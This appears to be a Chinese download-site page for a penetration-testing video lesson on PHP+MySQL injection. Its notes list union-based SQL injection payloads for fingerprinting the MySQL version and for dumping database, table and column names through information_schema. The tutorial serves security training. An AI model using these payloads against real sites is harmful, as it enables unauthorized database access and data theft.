您现在的位置:圣剑网 >> 动画教程 >> 漏洞检测 >> 实战渗透测试第七课:php+mysql注入实战教程
实战渗透测试第七课:php+mysql注入实战教程
软件大小:19.1 MB
更新时间:2016-11-01 01:29
授权方式:共享版
人气访问:314次
运行环境:Windows All 32/64位
软件评级:
分享好友:
实战渗透测试第七课:php+mysql注入实战教程介绍

讲师:巅峰邪恶

动画名称:渗透测试第七课   php+mysql注入 

测试环境:Win7 系统


判断数据库类型及版本


mysql 4.0的版本是没有infromation这个库的  所以只能用access的方法来注入


mysql 5.0及以上版本是可以用information这个库来注入的



and ord(mid(version(),1,1))>51 返回正常说明是mysql数据库,并且版本大于4.0,支持union联合查询


url /*hack*/ 判断是否为mysql数据库


order by 判断字段数


union select 字段数  暴哪些数字显字段



union select 1,2,database(),version(),user(),6  


databse()数据库名   version()数据库版本   user()当前用户



暴表名


union select 1,2 table_name,4,5,6 from information_schema.tables where table_schema=库名(十六进制) limit 0,1


limit 0,1中的0表示查询库中的第一个表。


暴字段内容


union select 1,2,字段名,6 from 库名.表名 或直接跟表名


暴字段


union select 1,2 column_name,4,5,6 from information_schema.columns where table_name=表名(十六进制) limit 0,1



暴所有数据库名


and 1=2 union select 1,group_concat(schema_name),3,4 from information_schema.schemata

 

该语句是查询”schemata”表中的 schema_name 字段,从而获得所有数据库名称。


暴当前库所有表

and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where 

table_schema=database()


该语句是查询 tables 表中的 table_name 字段,其查询条件为数据库名称字段

table_schema 值为当前数据库,从而获得当前数据库中的所有表



暴当前表的所有字段


and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns 

where table_name=表名的十六进制编码


该语句是将指定的表名转换为十六进制编码,查询该表名中 columns 表中存储于该

表明相同的数据库中的所有字段名,从而获得当前数据库指定表中的所有字段名

实战渗透测试第七课:php+mysql注入实战教程下载地址
网友评论

关于圣剑 - 广告服务 - 招聘信息 - 友情连接 - 保护隐私权 - 意见反馈 - 帮助中心 - 联系我们

Copyright © 2016 Sjian.Net Inc. All Rights Reserved.大千网络科技有限公司 版权所有

不良信息举报中心 陕ICP备10005927号 陕公网安备61010402000003号